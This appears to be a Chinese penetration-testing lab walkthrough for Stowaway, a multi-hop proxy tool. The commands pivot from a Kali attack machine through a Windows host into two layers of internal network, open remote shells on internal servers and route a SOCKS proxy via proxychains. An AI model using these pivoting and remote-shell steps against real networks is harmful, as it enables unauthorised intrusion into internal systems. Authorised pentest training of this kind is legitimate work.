stowaway多层内网代理工具

前言：

Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具，用户可使用此程序将外部流量通过多个节点代理至内网，突破内网访问限制，构造树状节点网络，并轻松实现管理功能

(https://github.com/ph4ntonn/Stowaway)

环境搭建：

（admin）攻击机（kali）：172.16.1.233

（node0）外网双网卡主机（win10）：172.16.1.235、192.168.22.133

（node1）一层内网主机(server12)：192.168.22.131、10.10.0.128

（node2）二层内网（server16）：10.10.0.129

（node2上部署了phpmyadmin用于检验socks代理）

1、win10上执行下属命令：开启监听，设置密码为joyboy

windows_x64_agent.exe -l 172.16.1.235:2233 -s joyboy

2、kali执行：连接win10

./linux_x64_admin -c 172.16.1.235:2233 -s joyboy

help可查看admin节点帮助：

• detail: 展示在线节点的详细信息
• help: 展示主panel的帮助信息
• topo: 展示在线节点的父子关系
• use: 使用某个agent
• exit: 退出stowaway

2、使用agent节点

use 0命令 进入0节点，help查看帮助信息

3、使用listen命令开启win10的监听——模式选1.Normal passive———设置箭筒端口

1. Normal passive: 此选项意味着agent将会以普通的方式监听在目标端口，并等待子节点连入
2. IPTables Reuse：此选项意味着agent将会以IPTables Reuse的方式复用端口，并等待子节点连入
3. SOReuse：此选项意味着agent将会以SOReuse的方式复用端口，并等待子节点连入

4、在server12上面使用命令：agent.exe -c 192.168.22.132:3344 -s joyboy，连接win10

回车后看到node0上有了node1的会话，查看节点关系

5、back返回到admin面板——use 1切换到node1——输入shell命令——得到server12的shell

6、同样的方式在node1(二层内网地址：10.10.0.128)上监听，然后在serve16上使用命令agent.exe -c 10.10.0.128:5566 -s joyboy

退回至admin节点查看新加入节点node2,shell得到二层内网shell

7、多层内网重复上述操作.............

8、开启目标socks服务：

配置/etc/proxychains4.conf

在代理中打开浏览器

成功访问到10.10.0.129（二层内网）

原文始发于微信公众号（fly的渗透学习笔记）：stowaway多层内网代理工具